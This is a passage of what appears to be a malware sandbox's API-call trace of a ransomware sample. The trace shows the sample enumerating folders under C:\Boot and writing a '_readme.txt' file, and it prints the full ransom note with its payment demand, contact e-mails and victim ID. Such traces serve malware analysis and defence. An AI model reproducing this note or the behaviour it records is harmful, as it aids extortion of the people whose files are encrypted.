[0165.697] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.697] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.697] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.697] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.697] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.697] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.697] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.697] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.697] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.697] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.697] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.697] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.697] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.697] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.697] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.697] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.697] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.697] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.697] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.697] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.697] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.697] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.697] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.697] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.697] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.697] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.697] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.697] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.697] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.697] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.698] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.698] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.698] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.698] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.698] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.698] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.698] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.698] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.698] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.698] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.698] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.698] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.698] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.698] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.698] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.698] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.698] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.698] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.698] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.698] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.698] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.698] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.698] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.698] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.698] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.698] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.698] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.698] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.698] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.698] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.698] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.698] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.698] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.698] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.698] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.699] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.699] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.699] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.699] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.699] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.699] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.699] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.699] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.699] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.699] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.699] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.699] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.699] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.699] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0165.699] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.699] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.699] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.699] PathFindFileNameW (pszPath="") returned="" [0165.699] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.700] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.700] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.700] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.700] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.700] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.700] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.700] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0165.700] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.700] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.700] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0165.700] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.700] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.700] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.700] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.700] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.701] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.701] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.701] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.701] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.701] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.701] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.701] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.701] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.701] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.701] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.702] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.702] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.702] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.702] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.702] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.702] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.702] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.702] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.702] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.702] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.702] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.702] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.702] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.702] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.702] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.702] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.702] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.702] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.702] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.702] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.702] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.702] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.703] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.703] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.703] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.703] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.703] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.703] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.703] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.703] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.703] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.703] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.703] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.703] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.703] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.703] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.703] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.703] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.703] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.703] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.703] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.703] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.703] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.703] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.703] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.703] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.703] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.704] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.704] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.704] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.704] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.704] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.704] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.704] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.704] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.704] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.704] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.704] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.704] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.704] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.704] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.704] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.704] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.704] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.704] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.704] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, 